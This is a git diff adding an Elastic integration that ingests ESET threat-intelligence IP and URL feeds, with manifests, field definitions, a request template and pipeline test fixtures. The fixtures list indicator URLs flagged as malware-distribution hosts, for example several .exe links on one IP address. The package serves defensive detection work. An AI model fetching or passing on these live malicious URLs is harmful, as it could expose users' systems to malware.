diff --git a/packages/ti_eset/data_stream/ip/fields/ecs.yml b/packages/ti_eset/data_stream/ip/fields/ecs.yml
new file mode 100644
index 00000000000..532e63297da
--- /dev/null
+++ b/packages/ti_eset/data_stream/ip/fields/ecs.yml
@@ -0,0 +1,40 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
+- external: ecs
+ name: error.message
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.created
+- external: ecs
+ name: tags
+- external: ecs
+ name: threat.indicator.name
+- external: ecs
+ name: threat.indicator.confidence
+- external: ecs
+ name: threat.indicator.provider
+- external: ecs
+ name: threat.indicator.url.original
+- external: ecs
+ name: threat.indicator.type
+- external: ecs
+ name: threat.indicator.description
+- external: ecs
+ name: threat.indicator.modified_at
+- external: ecs
+ name: threat.indicator.last_seen
+- external: ecs
+ name: threat.feed.name
+- external: ecs
+ name: threat.indicator.ip
+- external: ecs
+ name: threat.indicator.port
diff --git a/packages/ti_eset/data_stream/ip/fields/fields.yml b/packages/ti_eset/data_stream/ip/fields/fields.yml
new file mode 100644
index 00000000000..bf7e7383df2
--- /dev/null
+++ b/packages/ti_eset/data_stream/ip/fields/fields.yml
@@ -0,0 +1,21 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: valid_until + type: date + description: >- + Event expiration date. + - name: labels + type: keyword + description: >- + Threat labels. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: 'true' + description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_eset/data_stream/ip/lifecycle.yml b/packages/ti_eset/data_stream/ip/lifecycle.yml new file mode 100644 index 00000000000..326b14e00f6 --- /dev/null +++ b/packages/ti_eset/data_stream/ip/lifecycle.yml @@ -0,0 +1 @@ +data_retention: 7d diff --git a/packages/ti_eset/data_stream/ip/manifest.yml b/packages/ti_eset/data_stream/ip/manifest.yml new file mode 100644 index 00000000000..0a4125b24eb --- /dev/null +++ b/packages/ti_eset/data_stream/ip/manifest.yml 
@@ -0,0 +1,95 @@ +title: "IP" +type: logs +ilm_policy: logs-ti_eset.ip-default_policy +streams: + - input: httpjson + title: IP + description: Collect data from ETI IP feed + template_path: httpjson.yml.hbs + vars: + - name: url + description: URL with API root and identifier of IP collection as described by [TAXII v2.1 standard](https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.html#_Toc31107514) + type: text + title: Collection URL + multi: false + required: true + show_user: true + default: https://taxii.eset.com/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/baaed2a92335418aa753fe944e13c23a/objects/ + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: false + default: 1m + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@: + - name: interval + type: text + title: Interval + description: Interval at which the logs will be pulled. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 1h + - name: initial_interval + type: text + title: Initial Interval + multi: false + required: true + show_user: false + default: 48h + description: How far back to look for indicators the first time the agent is started. 
Supported units for this parameter are h/m/s. + - name: page_size + type: integer + multi: false + required: false + default: "1000" + show_user: false + title: Page size + description: Maximum number of records to pull in one request. + - name: ssl + type: yaml + title: SSL + multi: false + required: false + show_user: false + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - eset-ip + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original` + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: > + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + diff --git a/packages/ti_eset/data_stream/ip/sample_event.json b/packages/ti_eset/data_stream/ip/sample_event.json new file mode 100644 index 00000000000..7772317080e --- /dev/null +++ b/packages/ti_eset/data_stream/ip/sample_event.json 
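Review bot: The `proxy_url` description reads `http\[s\]://:@:`; the placeholders between the separators are missing, which looks like text whose angle-bracketed tokens were stripped on copy. Restoring them, `description: URL to proxy connections in the form of http\[s\]://<user>:<password>@<proxy_host>:<port>`, makes the expected shape clear to the operator filling it in. The `ssl` var has no `description` at all; a one-line pointer to the input's SSL options would be consistent with the neighbouring vars.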
@@ -0,0 +1,67 @@ +{ + "@timestamp": "2023-10-19T02:20:06.000Z", + "agent": { + "ephemeral_id": "013ad9c0-d817-4490-a524-0b3f275d2f1a", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.ip", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--905fad40-d804-4b89-ac9d-b616e0b8f6d3", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:20:06.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:22:22.857Z", + "dataset": "ti_eset.ip", + "ingested": "2024-03-27T14:22:34Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:20:06.000Z\",\"description\":\"Web services scanning and attacks\",\"id\":\"indicator--905fad40-d804-4b89-ac9d-b616e0b8f6d3\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:20:06.000Z\",\"name\":\"5.2.75.227\",\"pattern\":\"[ipv4-addr:value='5.2.75.227']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:20:06Z\",\"valid_until\":\"2023-10-21T02:20:06Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-ip" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Web services scanning and attacks", + "ip": "5.2.75.227", + "last_seen": "2023-10-19T02:20:06.000Z", + "modified_at": "2023-10-19T02:20:06.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } +} \ No newline at end of file 
diff --git a/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-common-config.yml b/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-common-config.yml
new file mode 100644
index 00000000000..4da22641654
--- /dev/null
+++ b/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-common-config.yml
@@ -0,0 +1,3 @@
+fields:
+ tags:
+ - preserve_original_event
diff --git a/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-eset-ndjson.log b/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-eset-ndjson.log
new file mode 100644
index 00000000000..437bdb6d0a7
--- /dev/null
+++ b/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-eset-ndjson.log
@@ -0,0 +1,10 @@ +{"id": "indicator--1a481dbe-e9b4-4f4b-a138-9171b13aaf3d", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host is known to be actively distributing threats or is of uncertain reputation.", "pattern": "[url:value='http://www.gacetafinanciera.com/MKK_Internals/GLOBALIZFINAN.pdf']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["benign"]} +{"id": "indicator--81565730-9217-49a5-aaf6-1331c29ec3a1", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='http://18.204.106.67/743576-1692568010.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["malicious-activity"]} +{"id": "indicator--56daf034-6fe6-4f3f-a201-bda39caf02f7", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='https://horacampinas.com.br/gm-de-valinhos-sera-a-1a-da-rmc-a-usar-fuzil-em-patrulhamento/']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["benign"]} +{"id": "indicator--ec0a1762-4418-4b4a-8245-d6eeabb69a4c", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively 
distributes high-severity threat in the form of executable code.", "pattern": "[url:value='https://www.bandt.com.au/lucid-agency-wins-philippines-tourism-account-to-drive-awareness-in-aunz/']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["benign"]} +{"id": "indicator--512f9cc9-ec75-4502-b6ec-50baab95a3f9", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='http://www.iema.net/resources/reading-room/2020/06/26/iema-eia-guide-to-climate-change-resilience-and-adaptation-2020']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["benign"]} +{"id": "indicator--c545b3d8-f6c1-4c8c-a7dc-9b4714fade27", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='http://18.204.106.67/736863-1697131982.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["malicious-activity"]} +{"id": "indicator--a6c01d1c-c14f-4dda-b3a2-7fdeeee59626", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='http://www.iztacala.unam.mx/carreras/psicologia/psiclin/vol9num2/vol9n2art1.pdf']", "pattern_type": "stix", "pattern_version": 
"2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["benign"]} +{"id": "indicator--6a2c6afd-37f3-4c71-9cd2-3378929115a9", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host is known to be actively distributing adware or other medium-risk software.", "pattern": "[url:value='https://paphoolred.com/afu.php']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["malicious-activity"]} +{"id": "indicator--c2c36c68-b456-41a1-aca8-1329655ed964", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='https://vitrea.macomp.co.il/netfiles/18501a092452EBEDBA048119DD7C4C7869634F6.pdf']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["benign"]} +{"id": "indicator--d2bf6040-34a3-4aee-9f99-779b3ef0c0c4", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='http://18.204.106.67/737375-1692567831.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["malicious-activity"]} \ No newline at end of file 
diff --git a/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-eset-ndjson.log-expected.json b/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-eset-ndjson.log-expected.json
new file mode 100644
index 00000000000..4e801a07484
--- /dev/null
+++ b/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-eset-ndjson.log-expected.json
@@ -0,0 +1,434 @@ +{ + "expected": [ + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--1a481dbe-e9b4-4f4b-a138-9171b13aaf3d", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--1a481dbe-e9b4-4f4b-a138-9171b13aaf3d\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host is known to be actively distributing threats or is of uncertain reputation.\", \"pattern\": \"[url:value='http://www.gacetafinanciera.com/MKK_Internals/GLOBALIZFINAN.pdf']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host is known to be actively distributing threats or is of uncertain reputation.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "http://www.gacetafinanciera.com/MKK_Internals/GLOBALIZFINAN.pdf" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--81565730-9217-49a5-aaf6-1331c29ec3a1", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--81565730-9217-49a5-aaf6-1331c29ec3a1\", \"type\": \"indicator\", \"spec_version\": \"indicator\", 
\"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='http://18.204.106.67/743576-1692568010.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "http://18.204.106.67/743576-1692568010.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--56daf034-6fe6-4f3f-a201-bda39caf02f7", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--56daf034-6fe6-4f3f-a201-bda39caf02f7\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='https://horacampinas.com.br/gm-de-valinhos-sera-a-1a-da-rmc-a-usar-fuzil-em-patrulhamento/']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"benign\"]}", + 
"type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "https://horacampinas.com.br/gm-de-valinhos-sera-a-1a-da-rmc-a-usar-fuzil-em-patrulhamento/" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--ec0a1762-4418-4b4a-8245-d6eeabb69a4c", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--ec0a1762-4418-4b4a-8245-d6eeabb69a4c\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='https://www.bandt.com.au/lucid-agency-wins-philippines-tourism-account-to-drive-awareness-in-aunz/']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + 
"type": "url", + "url": { + "original": "https://www.bandt.com.au/lucid-agency-wins-philippines-tourism-account-to-drive-awareness-in-aunz/" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--512f9cc9-ec75-4502-b6ec-50baab95a3f9", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--512f9cc9-ec75-4502-b6ec-50baab95a3f9\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='http://www.iema.net/resources/reading-room/2020/06/26/iema-eia-guide-to-climate-change-resilience-and-adaptation-2020']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "http://www.iema.net/resources/reading-room/2020/06/26/iema-eia-guide-to-climate-change-resilience-and-adaptation-2020" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--c545b3d8-f6c1-4c8c-a7dc-9b4714fade27", + "labels": [ + "malicious-activity" + ], + "valid_until": 
"2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--c545b3d8-f6c1-4c8c-a7dc-9b4714fade27\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='http://18.204.106.67/736863-1697131982.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "http://18.204.106.67/736863-1697131982.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--a6c01d1c-c14f-4dda-b3a2-7fdeeee59626", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--a6c01d1c-c14f-4dda-b3a2-7fdeeee59626\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": 
\"[url:value='http://www.iztacala.unam.mx/carreras/psicologia/psiclin/vol9num2/vol9n2art1.pdf']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "http://www.iztacala.unam.mx/carreras/psicologia/psiclin/vol9num2/vol9n2art1.pdf" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--6a2c6afd-37f3-4c71-9cd2-3378929115a9", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--6a2c6afd-37f3-4c71-9cd2-3378929115a9\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host is known to be actively distributing adware or other medium-risk software.\", \"pattern\": \"[url:value='https://paphoolred.com/afu.php']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Host is known to be 
actively distributing adware or other medium-risk software.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "https://paphoolred.com/afu.php" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--c2c36c68-b456-41a1-aca8-1329655ed964", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--c2c36c68-b456-41a1-aca8-1329655ed964\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='https://vitrea.macomp.co.il/netfiles/18501a092452EBEDBA048119DD7C4C7869634F6.pdf']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "https://vitrea.macomp.co.il/netfiles/18501a092452EBEDBA048119DD7C4C7869634F6.pdf" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--d2bf6040-34a3-4aee-9f99-779b3ef0c0c4", + 
"labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--d2bf6040-34a3-4aee-9f99-779b3ef0c0c4\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='http://18.204.106.67/737375-1692567831.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "http://18.204.106.67/737375-1692567831.exe" + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/url/_dev/test/system/test-httpjson-config.yml b/packages/ti_eset/data_stream/url/_dev/test/system/test-httpjson-config.yml new file mode 100644 index 00000000000..c400630e85b --- /dev/null +++ b/packages/ti_eset/data_stream/url/_dev/test/system/test-httpjson-config.yml 
@@ -0,0 +1,13 @@
+input: httpjson
+service: eti
+vars:
+ username: test
+ password: test
+data_stream:
+ vars:
+ preserve_original_event: true
+ url: http://{{Hostname}}:{{Port}}/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/1d3208c143be49da8130f5a66fd3a0fa/objects/
+ interval: 30s
+ enable_request_tracer: true
+assert:
+ hit_count: 2
diff --git a/packages/ti_eset/data_stream/url/agent/stream/httpjson.yml.hbs b/packages/ti_eset/data_stream/url/agent/stream/httpjson.yml.hbs
new file mode 100644
index 00000000000..41117cedade
--- /dev/null
+++ b/packages/ti_eset/data_stream/url/agent/stream/httpjson.yml.hbs
@@ -0,0 +1,72 @@
+config_version: "2"
+
+interval: {{interval}}
+request.method: "GET"
+{{#if enable_request_tracer}}
+request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson"
+{{/if}}
+
+auth.basic.user: {{username}}
+auth.basic.password: {{password}}
+
+{{#if url}}
+request.url: {{url}}
+{{/if}}
+{{#if ssl}}
+request.ssl: {{ssl}}
+{{/if}}
+{{#if http_client_timeout}}
+request.timeout: {{http_client_timeout}}
